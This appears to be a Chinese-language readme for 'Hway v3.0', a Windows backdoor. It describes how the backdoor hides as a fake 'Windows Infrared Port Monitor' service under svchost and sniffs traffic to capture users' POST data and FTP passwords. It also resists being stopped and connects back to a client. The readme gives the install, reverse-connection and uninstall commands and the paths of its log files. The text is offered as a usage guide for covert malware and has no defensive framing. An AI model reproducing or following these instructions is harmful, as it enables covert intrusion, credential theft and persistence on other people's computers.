Hway v3.0 by linx luantan2005@163.com --注册服务,利用svchost.exe启动(实现无启动项,无进程)+嗅探(实现无端口,并记录用户的POST数据和FTP密码)+线程保护 后门创建服务Windows Infrared Port Monitor,利用hostsvc.exe启动.安装日志写在C:\WINDOWS\system32\hwaylogV3.txt.嗅探日志在C:\WINDOWS\system32\snifflogV3.log. 具有线程保护,不能手工停止Windows Infrared Port Monitor服务.除非卸载该服务. hway.exe 为服务端,可改名. client.exe 为专用客户端,可改名. scan.exe 是一个多线程的端口扫描器. 最简单的用法: 安装 rundll32 hway.dll,install 反向连接: client.exe IP 任意可以访问的端口 hway 卸载: rundll32 hway.dll,uninstall
|
